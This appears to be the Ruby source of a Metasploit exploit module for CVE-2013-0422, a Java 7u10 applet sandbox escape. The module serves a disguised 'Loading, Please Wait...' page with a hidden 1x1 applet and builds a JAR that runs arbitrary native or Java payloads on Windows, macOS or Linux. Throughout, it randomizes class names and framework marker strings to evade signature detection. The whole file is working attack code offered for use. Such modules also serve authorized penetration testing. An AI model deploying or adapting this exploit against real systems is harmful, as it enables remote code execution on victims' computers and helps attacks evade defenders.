GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_jre17_jmxbean.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  # Module metadata for CVE-2013-0422, the JMX applet sandbox escape affecting
  # Java 7u10 and earlier. Targets are a Java payload (default) plus native
  # x86 payloads for Windows, OS X and Linux; payload size is capped at 20480.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Java Applet JMX Remote Code Execution',
        'Description' => %q{
          This module abuses the JMX classes from a Java Applet to run arbitrary Java
          code outside of the sandbox as exploited in the wild in January of 2013. The
          vulnerability affects Java version 7u10 and earlier.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown',      # Vulnerability discovery
          'egypt',        # Metasploit module
          'sinn3r',       # Metasploit module
          'juan vazquez'  # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2013-0422' ],
          [ 'OSVDB', '89059' ],
          [ 'US-CERT-VU', '625617' ],
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],
          [ 'URL', 'http://pastebin.com/cUG2ayjh' ] # Who authored the code on pastebin? I can't read Russian :-(
        ],
        'Platform' => %w{java linux osx win},
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
        'Targets' => [
          [ 'Generic (Java Payload)',        { 'Platform' => ['java'], 'Arch' => ARCH_JAVA } ],
          [ 'Windows x86 (Native Payload)',  { 'Platform' => 'win',    'Arch' => ARCH_X86 } ],
          [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx',    'Arch' => ARCH_X86 } ],
          [ 'Linux x86 (Native Payload)',    { 'Platform' => 'linux',  'Arch' => ARCH_X86 } ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2013-01-10',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Reads the two precompiled class files shipped under the framework's data
  # directory and picks a random name for the exploit class. The random name
  # has exactly the length of "Exploit" so the in-place byte substitution in
  # the class file does not change its size (presumably required because the
  # class file stores strings with explicit lengths -- confirm against the
  # shipped Exploit.class).
  #
  # Detection note: because of this substitution the literal "Exploit" class
  # name never appears in the served archive; it changes on every module run.
  def setup
    class_dir = File.join(Msf::Config.data_directory, "exploits", "cve-2013-0422")
    @exploit_class = File.binread(File.join(class_dir, "Exploit.class"))
    @loader_class = File.binread(File.join(class_dir, "B.class"))

    @exploit_class_name = rand_text_alpha("Exploit".length)
    @exploit_class.gsub!("Exploit", @exploit_class_name)
    super
  end

  # HTTP request handler. The request path selects the response:
  #   * anything ending in ".jar" (case-insensitive, any basename) -> the
  #     applet archive built by #build_jar;
  #   * a path ending in "/" -> the applet landing page, after the payload
  #     for this client has been (re)generated; a 404 is sent if that fails;
  #   * everything else -> a redirect to the resource root.
  #
  # @param cli     [Object] the connected client handle passed to the send_* helpers
  # @param request [Object] the parsed HTTP request; only #uri is read here
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      unless regenerate_payload(cli)
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Builds the landing page: a minimal HTML document with a 1x1 applet tag
  # whose archive attribute is a random 8-letter ".jar" name (the .jar branch
  # of #on_request_uri ignores the basename) and whose code attribute is the
  # randomized exploit class chosen in #setup.
  #
  # @return [String] the complete HTML document
  def generate_html
    applet_tag = %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
    [
      %Q|<html><head><title>Loading, Please Wait...</title></head>|,
      %Q|<body><center><p>Loading, Please Wait...</p></center>|,
      applet_tag,
      %Q|</applet></body></html>|
    ].join
  end

  private

  # Assembles the applet JAR: the encoded payload JAR with the renamed exploit
  # class and the loader class ("B.class") added. Every entry then has the
  # framework marker strings "metasploit" and "Payload" replaced, in both its
  # name and its data, by random alphabetic text of the same length, and the
  # manifest is rebuilt afterwards.
  #
  # Detection note: these replacements are drawn fresh per request, so neither
  # the marker strings nor the entry names are stable across downloads.
  #
  # @return [Object] the built JAR object as returned by payload.encoded_jar
  def build_jar
    jar = payload.encoded_jar
    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
    jar.add_file("B.class", @loader_class)

    replacements = {
      "metasploit" => rand_text_alpha("metasploit".length),
      "Payload" => rand_text_alpha("payload".length)
    }
    jar.entries.each do |entry|
      replacements.each do |marker, random_name|
        entry.name.gsub!(marker, random_name)
        entry.data = entry.data.gsub(marker, random_name)
      end
    end
    jar.build_manifest
    jar
  end
end